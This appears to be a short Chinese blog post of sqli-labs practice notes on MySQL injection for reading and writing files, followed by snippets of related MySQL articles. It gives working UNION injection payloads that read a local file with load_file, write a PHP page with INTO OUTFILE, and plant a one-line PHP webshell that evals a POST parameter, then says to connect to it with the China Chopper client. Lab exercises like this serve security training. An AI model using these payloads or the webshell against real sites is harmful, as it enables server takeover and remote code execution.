11 Mysql注入讀寫檔案

2021-10-01 02:43:16 字數 460 閱讀 9724

less 1

先在c盤新建乙個名為123的txt檔案

,然後訪問 union select 1, load_file(「c:\123.txt」),3 --+

less 7

自動寫入乙個內容為"<?php phpinfo();?>「的檔案

union select 1,」<?php phpinfo();?>",3 into outfile 「c:\phpstudy\phptutorial\www\sqli\less-7\123456.php」 --+

less 7

生成一句話木馬

union select 1,"<?php @eval($_post['chopper']);?>",3 into outfile 「c:\phpstudy\phptutorial\www\sqli\less-7\123456.php」 --+

用菜刀連線該檔案

禁止非法,後果自負

1 1 MySQL邏輯架構

1.1.mysql邏輯架構 心裡記著一張mysql元件關係圖對於理解mysql伺服器有很大幫助。圖1 1展示了一張mysql架構的邏輯檢視。最上面一層包含的服務不是mysql所獨有的。它是多數基於網路的客戶端 伺服器工具或者服務所需要的 連線處理 鑑權 安全等等。圖1 1 mysql邏輯架構圖 從第...

11 mysql匯出資料

1 txt格式 select from runoob.tb1 into outfile tmp runoob.txt 2 csv格式 select from passwd into outfile tmp runoob.txt fields terminated by enclosed by lin...

mysql匯出資料意義 11 mysql匯出資料

1 使用select.into outfile語句匯出資料 1 txt格式 select from runoob.tb1 into outfile tmp runoob.txt 2 csv格式 select from passwd into outfile tmp runoob.txt fields...